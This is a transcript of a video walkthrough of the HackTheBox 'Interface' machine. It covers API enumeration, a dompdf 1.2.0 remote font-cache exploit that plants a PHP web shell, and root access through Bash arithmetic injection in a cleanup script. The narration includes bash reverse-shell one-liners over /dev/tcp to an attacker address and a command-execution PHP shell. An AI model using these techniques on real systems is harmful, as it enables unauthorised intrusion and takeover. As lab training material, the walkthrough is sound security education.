What's going on YouTube? This is Ipsec. We do an interface from HackTheBox, which is a relatively straightforward box as long as you know how to properly enumerate API endpoints. There's a simple directory /API on one of the web servers that a lot of dirbusting just won't find because it responds with text, but also the HTTP status code is 404 because there's no route defined for API. And this is one of the main difficulties with enumerating APIs is just how you do Go bustering, so we'll jump into that in this video. And then you exploit a dompdf generator that creates a PDF based upon HTML. And for the privesc, it's something relatively cool. It's a bash arithmetic injection. You look at a bash script, it doesn't look that vulnerable at first glance, but because it's doing a math thing and you have user input, there is a trick you can do to get code execution. So with all that being said, let's just jump in. As always, we start with an nmap, so -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it interface, and then the IP address of 10.10.11.200. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open. The first one is SSH on port 22, and its banner tells us it's running an Ubuntu server. We also have HTTP on port 80, running Nginx, and also tells us it's Ubuntu. The HTTP title says it is site maintenance and doesn't really give us that much information, so let's just go take a look at the web server. So going to 10.10.11.200, we get just a "we will be back soon" page. Nothing really interesting here, but we can take a look at what type of web page it is. If I do index.html, we get this 404, this page cannot be found. I'm going to try like a .php, get the same exact message. So what I generally do to 404 messages or any type of error that's like non-completely default is I'm going to Google it real quick and see exactly what this returns. Put it in some quotes. And let's see. I see Next.js. So I'm guessing this web page is built upon Next.js. It's not a definitive thing, but I'm just guessing it is. And it is also potentially React. If I let's see, go to F12. Let's open up my debugger. And we can see some pieces of the web page. And we could click around. I don't think this actually tells us anything. I'm going to click the prettify thing in that bottom left. It disappeared now that I went off of it. But if I click this, it kind of parses it. And I can kind of take a look at just various things. Like if I search for HTTP, looking for like any URL that could be leaked here. Maybe I can do API is a good one. We see if it begins with API, it does something. So that may be a good indication. We should try that. And we just get a 404 page cannot be found. So another thing we should just do is try to confirm if this is Next.js or something like that. So I will go over to Burp Suite. So let's intercept this request. Refresh the page, that sends it over to my Burp Suite. Go in Repeater, and we can look at all the headers. We see an X powered by Next.js, so we have confirmed this is using Next.js. If we do a get on /, there is something else unique about this. It still does say Next.js. The whole reason, a logic behind trying / and just API was, if I go to API, I get a 404 page. If I go to 200, I just get this "we will be back soon." So maybe it's like some virtual host routing or some, not virtual host routing, but maybe API goes to a different server, right? I always wanted to just examine all the requests. It had different behavior. And there is something interesting about this. We have a content security policy header. And one of the pages is this prd.m.rengering-api.interface.htb. So let's go and add this into a host. So sudo vi etc host, and then 10.10.11.200, paste that domain in, and let's take a look at this. We just get file not found. So we should do some type of just playing around with this. I'm going to go back into intercept, refresh this, intercept on. So we see this, we get file not found. So I'm going to say get, and then question mark file is equal to test. File not found, okay. Let's try making this a post request. So we'll do change request method, and then file is equal to instead of doing test, let's just do etc passwd because that file does exist. We still get file not found. Now, this is probably a like Next.js or some type of JavaScript web server, and JavaScript does love JSON. So I'm going to change the content type to application JSON, and we can paste in some JSON, or not paste, but just type it in, and we still get file not found. So I still have no idea what parameter this thing wants. I'm going to copy this, and then we can say test.rec for test.request. I should copy to file, right? So let's go up a directory. This is interface. I'm going to make this actually file.request. If we cat file.request, that looks fine. I can v file.request, and I'm going to put fuzz here because we want to use fuff to fuzz this, right? And we can do fuff -request file.rec -request proto for protocol http. If we hit enter, we probably need a word list, opt sec list discovery web content. Let's do API, and then maybe actions lowercase .text. And we get absolutely nothing. So I'm guessing everything it gave was a 404. I'm going to do -mc all to match all status codes. And we can say -fs for filter size 36. And nothing. Is there any other API things we want to do? API seen in wild. That sounds cool. And it doesn't look like we're going to get anything. So we're going to have to fuzz this application, or not fuzz, but do another GoBuster. And there's something unique about this application and GoBuster. So if I just ran this, I don't think that is actually going to find anything. So let's just get to this topic. So we'll do GoBuster -u. We can paste this. And word opt sec list discovery web content raft small words .text. So it's going to run. And it's not going to find, well, it found a period, okay. But I don't think it finds anything else. It's taking a while. Let's try -t for thread. And we can say, what's the default threads? I want to say it's 50. Let's do 100. That'll go a bit faster, I think. Yep, definitely going faster. We get a 403 on vendor, so it found that. I actually didn't think it would be finding that. But let's see if it finds anything else. And there is something it should be finding. Let's just go back to this Git. Let's copy the host header. Paste it in. We get file not found. Now, if I do /API, we still get a 404. The header looks mostly the same, but we have this error message that says route not defined. But because this is a 404, GoBuster is none the wiser. So it's one of the major kind of pitfalls with it. It does have a -m flag, so we could do -m post to change that, and now it's going to make a post request to everything. FeroxBuster also has the -m. I know with FeroxBuster you can do -m and do post and get. Actually, GoBuster won't find this at all because it's got the negative status code 404. The best way that I generally fuzz APIs or do dirbust against it is use fuff. So if we do fuff -u HTTP, paste in the domain, and then word list opt sec list discovery web content raft small words .text, and we also have to say where we want to fuzz here. And we also the thing I hate about FUF is always use -mc all. And now we can do a filter size for 0, and we get API shown right away. And then if we fuzz API, we can get something else, but I think we'll have to use a different word list. Let's check this out. If I do API fuzz, we need to filter size for, I guess, 50. And see what this is. We'll probably want to change the method to a post. Because with APIs, it's not just about fuzzing the actual file. It's about fuzzing the file and the method, because APIs aren't based upon a file system. They're based upon routes. And if there's no route coded for a GET request, then it's going to return a 404. The route has to be coded for the exact method you want to use, right? And I don't think that's going to return anything. I just want to show FeroxBuster real quick because this is going to be also something cool. If we do HTTP, paste in this, then -m, we can say, get post like this. It's going to fuzz, but this version of FeroxBuster I have is really old. It only found vendor here. The newer versions, you'll know right away because it by default matches all status codes and also has a lot of just smart filtering based upon what a 404 is, right? Actually, I should leave that running. We can go to FeroxBuster GitHub. I probably need to turn Burp Suite off. Let's go FeroxBuster GitHub. Go here. Then we can download the latest. Let's see, what do we want? The 64 Linux sounds good. Zip will be fine. CP downloads. x86, FeroxBuster, and then unzip the file. And let's just do chmod +x, FeroxBuster. So I'm going to let this one finish. It's probably going to take another minute or two. And then we're going to run the newest version of FeroxBuster with the same exact arguments and see if it finds anything different. And I think it will. And this is just going to be a reminder and always keep your tools up to date because new features get added all the time. In specific, FeroxBuster, EPI, I don't know how to pronounce his name, but he does a wonderful job maintaining this. If you ever create an issue, he always gets back to you and adds a lot of cool things. So let's jump forward in time. Okay, so we see only vendor was discovered. I'm going to run the same command, but I'm going to do // this time. So we run the latest version. We see this was 2.7.0. Now we're on 2.10, and we see it doing some like auto filtering things. And right off the bat, instantly found the /API, right? So we could run yet another FeroxBuster on /API and see if it finds anything else. What word list is it using? It's using raft medium directories.txt, and we had used raft small words.txt. So let's see if the small dictionaries finds anything different. And we also did small words with a GET request. If we do -m, how do we change it to post? Let's see. -d, maybe? There we go. I'm guessing there's a better way to do that. I just put a random parameter in the post to change the method to post, right? And FeroxBuster has found HTML to PDF. So we could cheat and, FUF found it as well. So that is in both raf small words and the dictionaries, right? So if we do a get on slash HTML to PDF, we get that 404, which is annoying, right? But if we change that, so change the request method to a post, we get missing parameters, right? And whenever doing any type of data, it's telling us application JSON, we should match the content type and then send the parameters, right? So I'm going to do the fuzz thing again. This is HTML to PDF. So we're going to do bold, please subscribe, /bold. There we go. So let's copy this to a file. Where is copy to file? And now we'll call this HTML to PDF.request. We can kill this one. I'm going to go back to this one where we did the file.request, change to HTML to PDF.request, and see if we have anything. This is just a really small word list of APIs seen in the wild, so I'm not positive it's going to find anything. We kind of got to play this game of guess the word list when we fuzz parameters. I like trying, generally whenever I do APIs, to try a few files just because there's many different things, right? And this one, you can kind of guess the parameter, right? It says HTML to PDF and it says missing a parameter. So you could probably guess HTML and you get something, right? This one didn't find it, but I bet HTML is not in this word list. It is not. Is it in any of these? So if we did objects, we would have found it. So let's change our word list to objects.text. I'm sure it's probably in like raf small words and other things, right? But sometimes when doing testing on APIs, you just gotta be intuitive and guess, right? Here we have HTML as well. So we have a PDF. We should save this PDF to a file. So I'm going to copy as a curl command, and we're going to paste it. I'm going to do -o for out file. I'm going to call this test.pdf. If I do file against test.pdf, I was expecting an actual PDF. It gave me the whole, that's not what I wanted. I was hoping the -o would just save it to a PDF, but it saved the entire request. So let's just delete the header. And right here is probably the magic bytes for a PDF. So if we do file against it now, we have a PDF document. If we do exif tool against this, we can see its producer is dompdf 1.2.0. So let's take this to Google and see if there's any exploits against dompdf. So do this. We can probably also search exploit DB. I wonder if my search exploit is up to date. Let's see. We are version 1.2. That is 0.6. Over on exploit DB. 1.2.1 RCE. So I need to update my box. But we do have an exploit here. Let's just copy this. V exploit.py. Paste. How does this work? So we inject a CSS inject endpoint dompdf. I don't know if I like this exploit. There's a GitHub page for it. Whoops. Not open a new tab. This may have a better manual of what we're doing. Okay, so dompdf inject. It starts an HTML server. Let's see. Python 3, exploit, inject HTTP 10.10.14.8. Test. I really don't know. I think I'm going to have to look at this exploit. So let's go back to our web browser, and then we can search for dompdf 120 exploit maybe, and go to this repository, which is slightly different, and it kind of has the same thing of us running a web server, copying exploit and triggering it, but it also has a nice blog post. And the graphic is somewhat helpful as well. It says the first thing we do is inject CSS, then it will request a font from us. We send it a font, it gives us a PDF, and we access the cached font. So looking over this exploit, it has, let's see, pretty much doing the same thing. They have this title in PDF, and then they do a PDF info. We used exif tool to discover dompdf 120, right? And here's where they're talking about like looking for a vulnerability, checking if PHP is enabled. Additionally, it looks like the checking if is remote is enabled. And if is remote is enabled, then it allows them to do remote file stuff. So how they're doing it is they're doing a link relative style sheet and putting a CSS file. So let's copy what they do. So let's see, that was, I think, link rel, right? Link space rel equals style sheet href http 10.10.14.8 / we'll call this please subscribe.css. And actually they used single quotes. We'll use single quotes as well. And we end it. So we have to generate a PDF like this and see if the web server reaches back to us. So let's do sudo nclvnp 80, and then we go to burp, and let's see. We need to get a request where we fuzz that. So this was what? Post to API HTML to PDF, and then HTML is equal to this. We send it. Never came back to us. Let's make sure we type this correct. LINK space REL. LINK rel. I have style sheaf, style sheet. If we have correct CSS or HTML, I guess, it hangs and makes a connection back to us. We can kill that, and it gives us our PDF. So what we have discovered now is this is remote is enabled is set to true. So we can direct them at CSS hosted on our box. And it says when it's enabled, then we can give them this CSS file, and they're going to download it. And when it saves, it's going to go in this vendor dompdf lib fonts, and then a directory where we can execute code. So think of this like a file upload vulnerability, right? We're just uploading a PHP file to a web server. I'm going to make the directory www, and then we can do v, I'll call this exploit.html, paste this in, and we go 10.10.14.8. And it's calling it test_font.ttf. I'm just going to call it exploit.ttf. The font family, we can leave it at test font. I actually think this should be a .php. So font cache. This is how the font's going to be saved. We see the file put contents here. There are some special things. Let's see. How how it saves it, we save it to the font directory, the prefix, then underscore remote hash. The remote hash is going to be an MD5 sum of the remote file. And looking at it, how it's passing this, remote file doesn't look to be file contents to me. This is going to be a file name. So it's probably going to be http 10.10.14.8 /exploit-font.php or whatever. Is probably going to be what it gets, right? You wouldn't pass the whole file in an argument. That's just generally not how functions work, because that doesn't look like clean code. Like that could go on forever, especially a TTF file, which is non-ASCII, right? So this is probably the file name that we get MD5 sum. How it does it, it's going to take the family, which is in our CSS file, so that's test font. It's going to lowercase it. And then it does other things. Style string, style, so it's going to be underscore normal. So it's probably going to be test font underscore normal underscore whatever the MD5 sum of this string is. I don't know if it's going to be this whole string or just exploit.ttf. I would guess it would be the entire string. And then we save it. So the first thing I guess we have to do is check if this directory exists. So vendor dompdf. So I'm going to go over here. Let's just copy our host header. And vendor is one of those directories we did keep saying, right? So if we do /vendor, we get a, interesting enough, vendor without a slash gets access denied, vendor with a slash gets file not found. dompdf, access denied. If we put a thing that doesn't exist, we get not found. So right now I've just confirmed this directory exists. And then we want to do lib fonts, forbidden, not found. Okay, so this is going to be where the directory exists. So I'm going to say dom pdf font directory. Awesome. This we're not using anymore. We can trash that. This will be stage 1, I guess. So what we need now is the font file, and that was on their GitHub. So if we go to exploit, we can download exploit font.php. So I'm just going to click raw, save, and then we can, oh God, we'll call this exploit PHP, move, downloads, exploit font.php. So this is what came from the server, and it's just doing a PHP info. I guess we can leave that, right? So we have those two files, exploit underscore font, exploit.html. So we want to change this to be exploit underscore font. I don't know if it matters, but we will. Okay. So sudo python 3-m http server port 80. Forgot the period. There we go. And we'll call this exploit CSS, send it, and we see file not found. Move exploit.html, exploit.css, host it, run it. It's not getting it again. I'm guessing there's some type of caching. So if you do it wrong, you may have to rename something, which is going to be annoying. Let's call it pern.css now. It took longer, and we see it got exploit font.php. So based upon the naming convention, I'm going to think we need an MD5 sum this string. Let's put that in single quotes. And we get this. So I'm going to guess it's test font normal then this. So let's go here. I'm going to do test font normal this hash .php. File not found. see, is there a timing thing? Do we have to do this like right away? Hit. Let's see. Is it TTF? Let's go back to the write-up. Okay, let's see. They have this as the string. Let's see. Test font, normal, this. I'm going to MD5 sum this string to see if it equals D249. Echo-n, MD5 sum, D249. So that is correct. I don't know why this is not working. 10.10.14.8 exploit font.php normal. Move pwn to pwn 2. Let's try this again. So I'm going to get pwn 2. It takes a second, then right away, let's hit this. And there we go. I'm guessing it was some type of caching, right? This is definitely a PHP info. Let's see. I thought there was a way to render. I can't connect to browser. But we see the font. This is definitely PHP info. Yeah, right here. So let us now get a shell, right? So we can edit this exploit font.php and we can change it to be a shell, right? System request cmd like that. That looks fine. And I'm going to rename this to just be font.php vpwn2.css. I'm just renaming both of them because everything's so picky with caching on this box, right? There we go. We need to get this URL because we need the MD5 sum. There we go. So this one's going to be test font normal like this. We can change this request to be a post, cmd equals ID. And right now, 404 not found because it doesn't exist. Python 3-m HTTP server 80. Run it. We name this pwn3. Takes a second. Run. And we have ID, right? So now let's do the --c --i dev tcp 10.10.14.8 9001 0 and 1 like that. And don't forget to do URL encoding. nclvnp 9001. Send it. Get a shell. And let's do the TTY trick, right? pty.spawn bin bash. Awesome. stty raw minus echo fg enter. Export term is equal to xterm stty-a rows 31 columns 121. STY rows 21, calls 121, clear it, and we can begin looking for a privesc now. The first thing I always look at is some type of database file, and honestly, I don't know if we'll find one of those because I haven't really seen any need for a database in this application, right? This is going to be probably a Laravel application, I would think. just based upon these files. Maybe it's not. Let's see, find.grep Laura. No, it doesn't look like it. I don't know exactly what type of PHP application it is. Maybe that index did tell me. No idea what this PHP code is. Oh, I want to know what that file was. Remember when we hit on just the API or something, it said like invalid file or looking for a file? That's what I want to see real quick. Let's go to maybe up1 directory, HTML. Let's see, what was it? If we did a get on slash, I want to say. So that's a post on slash, file not found. Get. Yeah, so we get file not found. If I grep file not found with a period, we can do a -r and see if that exists here. Starting page, blog, node, modules. That's not it. I would think it would be here. Let's see, find.grep HTML2 PDF. Let's do grep-r HTML2 PDF. That is the route, right? Stage 1. Weird. Etsy Nginx. Let's go to sites enabled. Cat default. Let's see, server name. Let's go in var www API index.php. Snippets fast CGI. There should be something HTML2 PDF here. Route not defined. I'm not sure what this is. We do know that files are being cleaned up because when we were getting the shell, one of the files disappeared, right? So let's run a pspy to see exactly what that cleanup script looks like. So if we do pspy GitHub, we can pull this. And let's just go here, pspy 64 small, save, move, downloads pspy here, dev shm, wget 10 10 14 8 8000 pspy 64s. Make it executable. And then when we execute it, we get glib not found. Let's just download regular pspy. Download this, start it up. Wget it. I made that mistake twice. There we go. Okay, so a lot of this stuff just gets stripped from the small edition of pspy, and one of that, I guess, was how it did linking. I don't know, but the regular edition worked. So I'm going to give this a minute or two, and we'll see if any new processes really start up, and we can maybe examine the cleanup script. And there we go. We see a script called cleancache.sh. So let's take a look at it. So if I do a cat against it, actually let's do vim. So we have syntax highlighting. We can see what this looks like. So it sets the cache directory to temp, loops through all the files. If there's a file, it's going to run exif tool, process, producer, C file. So it's assigning the producer tag to meta producer, and then checking if it's dompdf. If it is, then it removes it. And this is actually the vulnerable part. It's doing some type of arithmetic equation, and it's actually vulnerable. It's one of the weirder quirks of Bash. It doesn't really stand out. I didn't know about it before this box, but let's see. Bash arithmetic injection, I think I spelled that correctly. NCC group generally puts out a lot of great things. And if we go to this post, they have quite a bit of information. They give a payload like this to inject into what we need to do. So essentially, you may think this is a safe way to do it, but it does allow for code injection to detect, I guess, the output of an executable against something, right? And we can take advantage of that. So the main thing we'll have to do is set the producer to be whatever string we want, right? And I'm going to go in dev shm, and we will call this shell.sh. And let's just do a reverse shell. So bin bash -i dev tcp 10.10.14.8 9001 0 and 1. And the reason why I didn't put a --c there, because this is going to tell it to be executed by bash, right? So you just make this executable. And then we want to create a file that will have the producer set to what we want. So let's just touch. I'm going to call the file clean me. And then if we do exif tool dash producer is equal to this, and we're going to change this against the file. We're going to put, instead of the uname, we'll do dev shm shell.sh. And if I do exif tool against clean me, we can see producer is set to this. So when it does the check, it should execute this script. And when that script gets executed, let's see, let's just copy and paste this. It sends us the file, right? So let's do cp clean me /temp. Because I think that's where it's getting the file from. Let's see. Cache directory /temp. Yeah. So if I go to /temp, we see clean me exist. So I'm going to just run pspy yet again, and we're going to wait, I'd say 2 minutes. So I'm just going to do a sleep 120. Did it just execute? I don't know what that was. That doesn't look like it doing that. It's cleaning something with PHP sessions. But I don't have a shell and it didn't execute. So let's just wait 2 minutes and see if we get a shell. I guess I could check ls temp. Clean me still exist. Okay. So yeah, let's just wait to see if we get a shell. And there we have it. The cleanup script ran. We can see it executing here. Let's see, bash-c, clean.sh. I'm looking for where it actually executed. Here we go. So it finally does this and executes our shell. And when it does that, we get a root shell here, and we can get root.txt. I wonder what clean.sh is. Looks like it's actually doing the cleaning of the fonts, because the font wasn't stored in /temp, right? It was stored in this directory, but That's going to be the video. Hope you guys enjoyed it. Take care, and I will see you all next time.